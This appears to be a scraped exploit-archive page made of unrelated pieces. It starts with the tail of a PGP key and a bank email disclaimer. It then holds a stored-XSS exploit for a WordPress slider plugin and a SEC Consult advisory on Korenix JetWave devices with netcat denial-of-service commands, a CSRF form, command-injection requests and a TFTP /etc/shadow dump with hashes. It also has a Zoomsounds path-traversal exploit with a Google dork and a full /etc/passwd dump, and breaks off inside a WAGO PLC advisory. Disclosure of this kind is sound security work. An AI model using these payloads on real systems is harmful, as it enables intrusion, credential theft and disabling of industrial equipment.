/>FtvIptzpfn9CbXsQViR6AJY6CffOs9Lm/UN/LbZCBLPmJTOXkGqw/vfkBRZwwcbH<br />352tS85UXc0C+EAXhfQj34AkfIHR+O02JU+pP/obdKoxXC3GcHRBOqI9JaV1Qehv<br />Xyl04rbGLssIjx9Bi3+f7dis4SfQpt157pnZetcWQRGM0/EvGtLT/zrYwueNI6qU<br />XVoKqGWPUJEfVaA6f+iVpj0Jv4uy4t4vo5MKcVtQY7RY00T1cCNeBxRW8MqYGubT<br />j3NiUndOu3V1FlX9kerTYJEigxVzvB9t9LuYOlqEBfhsU5x0L60o2/M9Max81yg1<br />93jDPDflCHhQqc2f2hHHJPYnXQceomlaD+CIHxxa5vWwTl6pPNkuSOBTw5A5FAMu<br />HJLFJnAPuTp4hXAS6fjs827jpJd9L6xN/sXj+CLJuDvREAYI7cVhTByT3GjWfGUT<br />754cJU+frd08FuLHbMLjp+d2ybGT53sHj5LDJrV/YRSjmzHniEhRM8OucIbl+k/n<br />lBtHxlMUmXBIodj7D0acW4m+pEMI7xsHKRLjuwAXi88oaRhKCn2nLMJTcwARAQAB<br />tCtUSU5HIE1lbmcgWWVhbiA8VGluZy5NZW5nWWVhbkB1b2Jncm91cC5jb20+iQJU<br />BBMBCAA+FiEEqd3a+A8bLZBoo4of7xtCbb3H/4cFAl5OZxUCGyMFCRLPlKsFCwkI<br />BwIGFQoJCAsCBBYCAwECHgECF4AACgkQ7xtCbb3H/4fivhAA3oRlhncZzXcm+tVO<br />0atU1i7HcHjWOUtgzSV3E17C4Fi3cpkoLtuDjAcNdLWyX3ofcKUnVm6Pna9xbWJ0<br />h21BYwoScVZMKm7IGMsk2Ovfn6zVNVgKxJ+CkD+dePLKv1iIXHAmU+G9ddgKhDrf<br />4C1w/0mwd8gVay+tN5h57XlfaDoOVW846yRXX+imBrwW4oZWRL4Pt2e4cW7p9Ngu<br />O5lIJiossLjIrHSKIdQ2AYX1ufjHjoBbp/rQJ9vNp40EPz9L46dRTlu7DYk4CwI+<br />0Fd7HhZ0puMgTSPUXLHIiORzmAzyiy9BHLRJBBLQzkg9i6LQCNtD/xByILFCg0dH<br />fuZf2rgNq3GGDfFd9PIEqHNVd4B7a8b/wgRracsIHbGG6sk3iMa/Dm4vp35A35pR<br />q15FVtMS3cJoEs55jAowrE6FnZ/PBNjlejxOqQMlfcESdzRf18+ywAxce0R/Y0Cx<br />L9X017vewYm+f9VqTO51Scq+fq/9QIGvi85+YLx9SZ6mqqRmoKWH5MefNQoGgM5U<br />Jb2hSJVXqhREd3ZaRb/+UZ964Yf8F7xIoI+kQUMwOJPGjmLm1yMklfNcDMGiiM5Z<br />Igw9F0gut10VrNrY3SJJraOa+IdX2t3tFlKwJdC1W50E5cUR6y9UMu/7Q+f+3o6T<br />CMdqiXxJ7JuSWHRKA1iAQ3lxAsu5Ag0EXk5nFQEQAOG5Ypef8P/Omtv6HghvcLCK<br />8EJ5R+99O+YFS0EuuSSZ3yReB7ImWg7RKx4Xwnr3LrKzcdVvgERwWoiXFi7F2736<br />hqvfjwBbwJw1iBTcnKF5uEhafjDHfM/mhMt/bMrJPBX4dee9D0TahuV/cgRqORXu<br />0dj6z6cNrFeZS+fgAgbVlAkvvtiPgT8SCGyBDQntYBYo631fkSS9GrfOb5curH9y<br />xRb+yugWP+bSWNWMEGfs+SQi90a28Te1NzOoca3hhgcjv1lZQkMmKtg91jPqxRHd<br />JPul1IhYPBEE0yLrP845KwGyoM/4Zd+wSxjdmgOP/bULflXiGff2doVdoVTPo3wK<br />zQxIQ2/3X50Dlnc4oDN2R8fvph1HP3VdweJ0r3PsPNcfRa7ckgmogHX5ISGNnSr5<br />qbm/V5Y11Pm9BnTCOz32cDD2sB7d9u58PD4c0IUDCYK0rMQ8r4Bhbmt3NeXO7V4O<br />o4p7BZIuJYH8wz4Q/dPNS7EHacg9iOzbDJk95frzkwSLu8rUQCByDNJaARaaVpMM<br />kdGzWFw7s/vbuRoyBSI4R2xAM8Ze9njFZDowXrImPJaFhlAF40JUbL5I85dVeQSd<br />dtd2A7h2dTktgKe0+jFgGNbOwQT9z7ziY0jzd2xcIgXDL+O95nfy0aaiIWL+8AN/<br />IsVj3qnkQjPOLTecrndxABEBAAGJAjwEGAEIACYWIQSp3dr4DxstkGijih/vG0Jt<br />vcf/hwUCXk5nFQIbDAUJEs+UqwAKCRDvG0Jtvcf/h9mpEADJZ/N8J8MXCmnp0oHQ<br />VNc/M1IhNJZhOmlJdqV+PQVHe8FFJv924avh4Nh6nX+U7Qx7uX7DC82BsLhx3rui<br />5HWzHt/x7ORegwYBz7frvlApT1IF84wLpGBV+rJnC1kscHv5iQN9OEtOAlcvoz2l<br />7d0aXs+/x5ueJol9Psu1xcwOyjili21Ucu7GAwAPRzyK9IMhgKPW/w1yD8ADUIxu<br />Uzg8Qy9bIElPMlaw5m1hHmEbDUF/2kxYPnfvF4AAaff1jSFhJHwTNzploI5nNnT6<br />vm/waE/rwpbDlsTZ5lKan4UJvwQuG5R8aEegNpllD3/2Yhk8/8CEkuGRM5UfNDRM<br />bhH4WG6jy1xGzSvjQughoUt8xlXJhJD+AeCCwukWmkNK160jDZNN5aG2iUgoMXOM<br />pFhSdLOa8Q+4yu+/2LaPnBSElTbSXpgqA7aTyxrfl5yhLF/FKDI/zDhVMmSNuvAr<br />cGBbNjfZflaeJmdFXMSU3a3makS3utMyiHl7BNrwjzHVjWpqvLdo9Jyb3vIpOKO3<br />3mH9yER0ML0lrHXrLZCbgHDXp8Vktuxh8eDE3R/A1YUOTK95sODwbU42skn0V4cf<br />h9aNDpszjqbaniHOdnwLL8yof6Q8Ldn2Wxp8MkcTtdWBzNT6sD3D9AfsS0ikxddM<br />JMIzsDM4+GTLxyZrv4jCloLk9g==<br />=nECi<br />-----END PGP PUBLIC KEY BLOCK-----<br />UOB EMAIL DISCLAIMER<br />Any person receiving this email and any attachment(s) contained,<br />shall treat the information as confidential and not misuse, copy,<br />disclose, distribute or retain the information in any way that<br />amounts to a breach of confidentiality. If you are not the intended<br />recipient, please delete all copies of this email from your computer<br />system. As the integrity of this message cannot be guaranteed,<br />neither UOB nor any entity in the UOB Group shall be responsible for<br />the contents. Any opinion in this email may not necessarily represent<br />the opinion of UOB or any entity in the UOB Group.<br /><br /><br /><br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin Slider by Soliloquy 2.6.2 - 'title' Stored Cross Site Scripting (XSS) (Authenticated)<br /># Date: 02/12/2021<br /># Exploit Author: Abdurrahman Erkan (@erknabd)<br /># Vendor Homepage: https://soliloquywp.com/<br /># Software Link: https://wordpress.org/plugins/soliloquy-lite/<br /># Version: 2.6.2<br /># Tested on: Kali Linux 2021 - Firefox 78.7, Windows 10 - Brave 1.32.113, WordPress 5.8.2<br /><br /># Proof of Concept:<br />#<br /># 1- Install and activate the Slider by Soliloquy 2.6.2 plugin.<br /># 2- Open Soliloquy and use "Add New" button to add new post.<br /># 3- Add payload to title. Payload: <script>alert(document.cookie)</script><br /># 4- Add any image in post.<br /># 5- Publish the post.<br /># 6- XSS has been triggered.<br />#<br /># Go to this url "http://localhost/wp-admin/post.php?post=1&action=edit" XSS will trigger. - For wordpress users.<br /># Go to this url "http://localhost/?post_type=soliloquy&p=1" XSS will trigger. - For normal users.<br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220131-0 ><br />=======================================================================<br /> title: Multiple Critical Vulnerabilities<br /> product: Korenix Technology JetWave products:<br /> JetWave 2212X, JetWave 2212S, JetWave 2212G,<br /> JetWave 2311, JetWave 3220<br /> vulnerable version: See "Vulnerable / tested versions"<br /> fixed version: See "Solution"<br /> CVE number: CVE-2020-12500, CVE-2020-12501, CVE-2020-12502,<br /> CVE-2020-12503, CVE-2020-12504, CVE-2021-39280<br /> impact: Critical<br /> homepage: https://www.korenix.com/<br /> found: 2020-04-06<br /> by: T. Weber (Office Vienna)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Korenix Technology, a Beijer group company within the Industrial Communication<br />business area, is a global leading manufacturer providing innovative, market-<br />oriented, value-focused Industrial Wired and Wireless Networking Solutions.<br />[...]<br />Our products are mainly applied in SMART industries: Surveillance, Machine-to-<br />Machine, Automation, Remote Monitoring, andTransportation. Worldwide customer<br />base covers different Sales channels, including end-customers, OEMs, system<br />integrators, and brand label partners."<br /><br />Source: https://www.korenix.com/en/about/index.aspx?kind=3<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides an updated firmware which should be installed immediately.<br /><br />SEC Consult recommends to perform a thorough security review conducted by<br />security professionals to identify and resolve potential further critical<br />security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Unauthenticated Device Administration (CVE-2020-12500)<br />Korenix, Westermo (members of the Beijer Group) and Comtrol (Pepperl+Fuchs) are<br />sharing a partially similar firmware base for the industrial devices. They can<br />be managed via a Windows client program called "Korenix View" or "Jet View".<br /><br />This program communicates in plaintext via UDP. All messages that are sent to<br />the device are broadcast in the whole subnet and the answers from the devices<br />are sent back via broadcast too.<br />The older version of this management program, called "cmd-server2", can be<br />controlled without a password. Analyzing the newer version, called<br />"jetviewd", indicates that some kind of password can be set. But this is not<br />part of the default configuration.<br /><br />Actions that can be done via this daemon, listening on UDP port 5010, are:<br /> * Modifying networking settings (IP, netmask, gateway)<br /> * Initiating self tests and blink LEDs on the device<br /> * Triggering download and upload of configuration files (via TFTP)<br /> * Triggering uploads of new firmware and bootloader files (via TFTP)<br /><br />The device can also be bricked via this daemon so that it is necessary to press<br />the reset button and re-configure the settings.<br /><br /><br />2) Cross-Site Request Forgery (CSRF) (CVE-2020-12502)<br />The web interface, that is used to set all configurations, is vulnerable to<br />cross-site request forgery attacks. An attacker can change settings via this<br />way by luring the victim to a malicious website.<br /><br /><br />3) Multiple Authenticated Command Injections (CVE-2020-12503)<br />Multiple command injection vulnerabilities were found on the device series<br />"JetWave".<br /><br />They are partially sharing the same firmware base. Therefore, the payloads to<br />exploit those command injections are similar. Due to the lack of CSRF<br />protection, an attacker can execute arbitrary commands on the device by luring<br />the victim to click on a malicious link.<br /><br /><br />4) Hidden OS Web-Shell Interface (CVE-2021-39280)<br />The endpoint /syscmd.asp in the web interface of the devices contains an<br />undocumented web-shell that can be used to invoke system-commands as root<br />after authentication.<br /><br />It seems that this is part of the used SDK and a leftover artifact.<br /><br />In combination with the missing CSRF protection, this vulnerability poses a<br />higher risk.<br /><br /><br />5) Arbitrary Unauthenticated TFTP Actions (CVE-2020-12504)<br />A TFTP service is present on a broad range of devices for firmware-,<br />bootloader-, and configuration-uploads/downloads. This TFTP server can be<br />abused to read all files from the system as the daemon runs as root which<br />results in a password hash exposure via the file /etc/passwd. Write access is<br />restricted to certain files (configuration, certificates, boot loader,<br />firmware upgrade) though.<br /><br />By uploading malicious Quagga config-files an attacker can modify e.g.<br />IP settings of the device. Malicious firmware and bootloader uploads are<br />possible too.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Unauthenticated Device Administration (CVE-2020-12500)<br />All commands can be sent via UDP port 5010.<br /><br />Device discovery (firmware/bootloader version etc. in response):<br />echo -e "\x00\x00\x00\x07\x00\x00\x00\x04\x00\x00\x00\x01" | nc -u $IP 5010<br /><br />Blink with leds:<br />echo -e "\x00\x00\x00\x5b\x00\x00\x00\x01\x01" | nc -u $IP 5010<br /><br />Permanent denial of service. The device is only available after pressing the<br />reset button to load the default config:<br />echo -e "\x00\x00\x00\x1f\x01\x01\x01\x04\x01\x01\x01\x01" | nc -u $IP 5010<br /><br />Present on:<br /> * Korenix JetWave (Multiple devices)<br /><br /><br />2) Cross-Site Request Forgery (CSRF) (CVE-2020-12502)<br />The following CSRF PoC can be used to ping 127.0.0.1. All other actions in the<br />context of the menu, like uploading config files, can be done in the same way:<br />-------------------------------------------------------------------------------<br /><html><br /> <body><br /> <script>history.pushState('', '', '/')</script><br /> <form action="http://$IP/goform/formping" method="POST"><br /> <input type="hidden" name="PingIPAddress" value="127.0.0.1" /><br /> <input type="hidden" name="submit-url" value="/toolping.asp" /><br /> <input type="hidden" name="Submit" value="Ping" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> </body><br /></html><br />-------------------------------------------------------------------------------<br /><br /><br />3) Multiple Authenticated Command Injections (CVE-2020-12503)<br />At least two command injections are present in the default web interface. It is<br />likely that more such vulnerabilities are present on the device.<br /><br />3.1) Semi-Blind Command Injection<br />The following command injection works on the devices:<br /> * Korenix JetWave (Multiple devices)<br /><br />The ping functionality in the web interface can be abused to inject system<br />commands in a semi-blind way. Two requests must be sent to the service to<br />retrieve the output of the command injection.<br /><br />The first request is a POST request to the endpoint /goform/formping:<br />-------------------------------------------------------------------------------<br />POST /goform/formping HTTP/1.1<br />Host: $IP<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 57<br />Connection: close<br />Cookie: -common-web-session-=::webs.session::9c10b4b1b22063e7fcba5369ff86e779<br />Upgrade-Insecure-Requests: 1<br /><br />PingIPAddress=;id;&submit-url=%2Ftoolping.asp&Submit=Ping<br />-------------------------------------------------------------------------------<br />This request triggers the actual command injection in a blind way. The output<br />can be fetched from the system by using the following GET request after<br />triggering the previous POST request:<br />-------------------------------------------------------------------------------<br />GET //toolping.asp HTTP/1.1<br />Host: $IP<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Cookie: -common-web-session-=::webs.session::9c10b4b1b22063e7fcba5369ff86e779<br />Upgrade-Insecure-Requests: 1<br />-------------------------------------------------------------------------------<br /><br /><br />3.2) Blind Command Injection<br />The following command injection works on the devices:<br /> * Korenix JetWave (Multiple devices)<br /><br />The configuration upload via TFTP in the web interface can be abused to inject<br />system commands in a blind way.<br /><br />The request is a POST request to the endpoint /goform/formTFTPLoadSave:<br />-------------------------------------------------------------------------------<br />POST /goform/formTFTPLoadSave HTTP/1.1<br />Host: $IP<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 121<br />Connection: close<br />Cookie: ui_language=en_US; -common-web-session-=::webs.session::f6070212ccae758d7d247fb8e2c52cd7<br />Upgrade-Insecure-Requests: 1<br /><br />submit-url=%2Fmgmtsaveconf.asp&ip_address=127.0.0.1;ping 192.168.1.1;&file_name=ap.conf&tftp_action=load&tftp_config=Submit<br />-------------------------------------------------------------------------------<br /><br /><br />4) Hidden OS Web-Shell Interface (CVE-2021-39280)<br />The endpoint /syscmd.asp can be accessed after successful login. It can be used<br />to execute system commands directly as root.<br /><br />Present on:<br /> * Korenix JetWave 2212X<br /> * Korenix JetWave 2212S<br /> * Korenix JetWave 2212G<br /> * Korenix JetWave 2311<br /> * Korenix JetWave 3220<br /> * Korenix JetWave 3420<br /><br /><br />5) Arbitrary TFTP Actions (CVE-2020-12504)<br />The Linux TFTP client was used to download files from the system using<br />absolute paths. Uploads were only possible on existing paths like:<br />/home/Quagga.conf<br />/home/bootloader.bin<br /><br />To download the /etc/passwd file from the system, the following<br />command was invoked:<br /><br />[user@localhost ~]$ tftp -m binary <Target-IP> -c get /etc/shadow<br />[user@localhost ~]$ cat shadow root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::<br />Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::<br />bin::10933:0:99999:7:::<br />daemon::10933:0:99999:7:::<br />adm::10933:0:99999:7:::<br />lp:*:10933:0:99999:7:::<br />sync:*:10933:0:99999:7:::<br />shutdown:*:10933:0:99999:7:::<br />halt:*:10933:0:99999:7:::<br />uucp:*:10933:0:99999:7:::<br />operator:*:10933:0:99999:7:::<br />nobody::10933:0:99999:7:::<br />ap71::10933:0:99999:7:::<br /><br />Present on:<br /> * Korenix JetWave (Multiple devices)<br /><br />The vulnerabilities 1), 2), 3), 4) and 5) were manually verified on an<br />emulated device by using the MEDUSA scalable firmware runtime.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following firmware versions have been identified to be vulnerable:<br /> * Korenix JetWave 2212X / 1.5<br /> * Korenix JetWave 2212S / 1.5<br /> * Korenix JetWave 2212G / 1.4<br /> * Korenix JetWave 3220 / 1.2<br /> * Korenix JetWave 3420 / 1.1.3T<br /> * Korenix JetWave 2311 / 1.2 is EOL now<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2020-04-14: Contacting CERT@VDE through info@cert.vde.com and requested support<br /> for the disclosure process due to the involvement of multiple<br /> vendors.<br />2020-04-15: Security contact responded, that the products were developed by<br /> Korenix Technologies.<br />2020-04-30: Security contact informed us, that some vulnerabilities were<br /> confirmed by the vendor.<br />2020-07-30: Call with Pepperl+Fuchs contact. Contact stated that the<br /> vulnerabilities were reported to Korenix.<br />2020-09-29: Call with Pepperl+Fuchs and CERT@VDE regarding status.<br /> Pepperl+Fuchs stated that they just have a sales contact from<br /> Korenix.<br />2020-10-05: Coordinated release of SA-20201005-0.<br />2020-10-05: Call with the helpdesk of Beijer Electronics AB. The contact stated<br /> that no case regarding vulnerabilities were opened and created one.<br /> The product owners of Westermo, Korenix and Beijer Electronics were<br /> informed via this inquiry. Set disclosure date to 2020-11-25.<br />2020-10-06: Restarted the whole responsible disclosure process by sending a<br /> request to the new security contact cs@beijerelectronics.com.<br />2020-10-07: Received an email from a Korenix representative which offered to<br /> answer questions about product security. Started responsible<br /> disclosure by requesting email certificate or whether plaintext can be<br /> used. Referred to the request to cs@beijerelecrtronics.com.<br /> No answer.<br />2020-11-11: Asked the representatives of Korenix and Beijer regarding the<br /> status.<br /> No answer.<br />2020-11-25: Phone call with security manager of Beijer. Sent advisories via<br /> encrypted archive to cs@beijerelectronics.com. Received<br /> confirmation of advisory receipt. Security manager told us that he<br /> can provide information regarding the time-line for the patches<br /> within the next two weeks.<br />2020-12-09: Asked for an update.<br />2020-12-18: Call with security manager of Beijer. Vendor presented initial<br /> analysis done by the affected companies.<br />2021-03-21: Security manager invited SEC Consult to have a status meeting.<br />2021-03-26: Agreed on an advisory split as other affected products will get<br /> patched later.<br />2021-04-12: Performed advisory split.<br />2021-05-26: Meeting regarding advisory publication. Agreed to release this<br /> advisory in Q4.<br />2021-06-01: Released related advisory SA-20210601-0.<br />2021-07-05: Follow-up meeting with vendor regarding next steps.<br />2021-07-16: Contact from Beijer Electronics reached out to Korenix. Engineers<br /> from Korenix are still investigating the issues. JetWave 2311 went<br /> EoL, next status update in August. JetPort will be fixed in<br /> Q1 2022.<br />2021-09-15: Asked for status update;<br />2021-09-20: Korenix will provide a time schedule for the patches by end of next<br /> week.<br />2021-09-28: Meeting regarding the schedule. Fixes will be available by end of<br /> the year for Korenix JetWave series.<br />2021-09-28: Update call with vendor; Fixes will be available in November.<br />2021-11-18: Contact had difficulties to get a response from Korenix. JetWave<br /> 2212G 1.8.0 has been released, other fixes will be released in<br /> December.<br />2021-11-22: Vendor provides all other fixed versions, which have already been<br /> put online.<br />2021-12-17: Performed another advisory split.<br />2021-12-20: Update call with vendor. Identified another possibly affected<br /> device (JetWave 3420). Investigation will be started from Korenix<br /> as soon as possible.<br />2021-12-28: Vendor has rolled out an update for the JetWave 3420 V3 firmware.<br />2022-01-17: Informed vendor about the advisory release within the next two<br /> weeks.<br />2022-01-19: Call with vendor; agreed that advisory can be published for<br /> JetWave series.<br />2022-01-24: Informed vendor about advisory release on 2022-01-31.<br />2022-01-31: Coordinated release of advisory.<br /><br /><br />Solution:<br />---------<br />The following firmware updates are being provided by the vendor:<br /><br /> * Korenix JetWave 2212X / 1.9.1<br /> * Korenix JetWave 2212S / 1.9.1<br /> * Korenix JetWave 2212G / 1.8<br /> * Korenix JetWave 3220 V3 / 1.5.1<br /> * Korenix JetWave 3420 V3 / 1.5.1<br /> * Korenix JetWave 2311 / is EOL now<br /><br />The firmware can be downloaded from the vendor's support page:<br />https://www.korenix.com/en/support/index.aspx<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Thomas Weber / @2022<br /><br /><br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin DZS Zoomsounds 6.45 - Arbitrary File Read (Unauthenticated)<br /># Google Dork: inurl:/wp-content/plugins/dzs-zoomsounds/<br /># Date: 2/12/2021<br /># Exploit Author: Uriel Yochpaz<br /># Vendor Homepage: https://digitalzoomstudio.net/docs/wpzoomsounds/<br /># Software Link: <br /># Version: 1.10, 1.20, 1.30, 1.40, 1.41, 1.43, 1.45, 1.50, 1.51, 1.60, 1.61, 1.62, 1.63, 1.70, 2.00, 2.02, 2.10, 2.20, 2.30, 2.42, 2.43, 2.44, 2.45, 2.46, 2.51, 2.60, 2.61, 2.62, 2.63, 2.64, 2.70, 2.72, 2.75, 3.00, 3.01, 3.03, 3.04, 3.10, 3.12, 3.21, 3.23, 3.24, 3.30, 3.31, 3.32, 3.33, 3.40, 4.00, 4.10, 4.15, 4.20, 4.32, 4.47, 4.51, 4.63, 5.00, 5.03, 5.04, 5.12, 5.18, 5.30, 5.31, 5.48, 5.60, 5.70, 5.82, 5.84, 5.91, 5.93, 5.95, 5.96, 6.00, 6.10, 6.21, 6.34, 6.45<br /># Tested on: Linux (DZS Zoomsounds version 5.82)<br /># CVE : CVE-2021-39316<br /><br />The vulnerability allows a remote attacker to perform directory traversal attacks.<br />The vulnerability exists due to input validation error when processing directory traversal sequences in the "link" parameter in the "dzsap_download" action. A remote attacker can send a specially crafted HTTP request and read arbitrary files on the system.<br /><br />Mitigation:<br />Install update from vendor's website.<br /><br />Vulnerable software versions ZoomSounds: <br />1.10, 1.20, 1.30, 1.40, 1.41, 1.43, 1.45, 1.50, 1.51, 1.60, 1.61, 1.62, 1.63, 1.70, 2.00, 2.02, 2.10, 2.20, 2.30,<br />2.42, 2.43, 2.44, 2.45, 2.46, 2.51, 2.60, 2.61, 2.62, 2.63, 2.64, 2.70, 2.72, 2.75, 3.00, 3.01, 3.03, 3.04, 3.10,<br />3.12, 3.21, 3.23, 3.24, 3.30, 3.31, 3.32, 3.33, 3.40, 4.00, 4.10, 4.15, 4.20, 4.32, 4.47, 4.51, 4.63, 5.00, 5.03,<br />5.04, 5.12, 5.18, 5.30, 5.31, 5.48, 5.60, 5.70, 5.82, 5.84, 5.91, 5.93, 5.95, 5.96, 6.00, 6.10, 6.21, 6.34, 6.45<br /><br />PoC:<br />user@ubuntu:~$ curl "http://localhost/MYzoomsounds/?action=dzsap_download&link=../../../../../../../../../../etc/passwd"<br /><br />root:x:0:0:root:/root:/bin/bash<br />daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin<br />bin:x:2:2:bin:/bin:/usr/sbin/nologin<br />sys:x:3:3:sys:/dev:/usr/sbin/nologin<br />sync:x:4:65534:sync:/bin:/bin/sync<br />games:x:5:60:games:/usr/games:/usr/sbin/nologin<br />man:x:6:12:man:/var/cache/man:/usr/sbin/nologin<br />lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin<br />mail:x:8:8:mail:/var/mail:/usr/sbin/nologin<br />news:x:9:9:news:/var/spool/news:/usr/sbin/nologin<br />uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin<br />proxy:x:13:13:proxy:/bin:/usr/sbin/nologin<br />www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin<br />backup:x:34:34:backup:/var/backups:/usr/sbin/nologin<br />list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin<br />irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin<br />gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin<br />nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin<br />systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false<br />systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false<br />systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false<br />systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false<br />syslog:x:104:108::/home/syslog:/bin/false<br />_apt:x:105:65534::/nonexistent:/bin/false<br />messagebus:x:106:110::/var/run/dbus:/bin/false<br />uuidd:x:107:111::/run/uuidd:/bin/false<br />lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false<br />whoopsie:x:109:117::/nonexistent:/bin/false<br />avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false<br />avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false<br />dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false<br />colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false<br />speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false<br />hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false<br />kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false<br />pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false<br />rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false<br />saned:x:119:127::/var/lib/saned:/bin/false<br />usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false<br />user:x:1000:1000:user,,,:/home/user:/bin/bash<br />mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false<br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220126-0 ><br />=======================================================================<br /> title: Denial of service & User Enumeration<br /> product: WAGO 750-8xxx PLC<br /> vulnerable version: < Firmware 20 Patch 1 (v03.08.08)<br /> fixed version: Firmware 20 Patch 1 (v03.08.08)<br /> CVE number: CVE-2021-34593<br /> impact: Medium<br /> homepage: https://www.wago.com/<br /> found: 2021-05-05<br /> by: SEC Consult Vulnerability Lab<br /> These vulnerabilities were discovered during the research<br /> cooperation initiative "OT Cyber Security Lab" between<br /> Verbund AG and SEC Consult Group.<br /> Gerhard Hechenberger (Office Vienna)<br /> Steffen Robertz (Office Vienna)<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Optimum performance and availability: Thanks to their ultra-high performance,<br />low power consumption, numerous interfaces, space-saving design and high<br />reliability, WAGO’s user-friendly controllers (PLCs) are cost-effective<br />automation solutions. For optimal automation both inside and outside the<br />control cabinet: the flexible IP20 remote I/O systems for all applications<br />and environments."<br /><br />Source: https://www.wago.com/us/c/controllers-bus-couplers-i-o<br /><br /><br />Business recommendation:<br />------------------------<br />WAGO's customers should upgrade the firmware to the latest version available.<br /><br />A thorough security review should be performed by security professionals to<br />identify further security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Denial of Service (Codesys) (CVE-2021-34593)<br />The "plclinux_rt" binary is listening on port 2455. It handles communication with<br />the CODESYS suite. By sending requests that define an invalid packet size, a<br />malloc error can be triggered. This leads to a denial of service of the remote<br />connectivity of the codesys service.<br /><br />This was also reported to and released together with CODESYS, find the<br />corresponding advisories here:<br />https://sec-consult.com/vulnerability-lab/advisory/codesys-v2-denial-of-service/<br />https://customers.codesys.com/index.php?eID=dumpFile&t=f&f=16877&token=8faab0fc1e069f4edfca5d5aba8146139f67a175<br /><br /><br />2) Enumeration of Users<br />Due to a time-based side channel vulnerability, it can be derived which<br />usernames are valid. This eases the process of brute-forcing valid credentials.<br /><br /><br />3) Outdated Software with Known Vulnerabilities<br />The PLC is using multiple outdated software components with known exploits.<br /><br /><br />4) Insufficient Hardening of Binaries<br />Multiple binaries are not compiled with available security features. This will<br />ease further attacks once a memory corruption vulnerability has been spotted.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Denial of Service (Codesys) (CVE-2021-34593)<br />Codesys packet headers are structured like below (pseudo code):<br /><br />struct codesys_header {<br /> uint16_t magic,<br /> 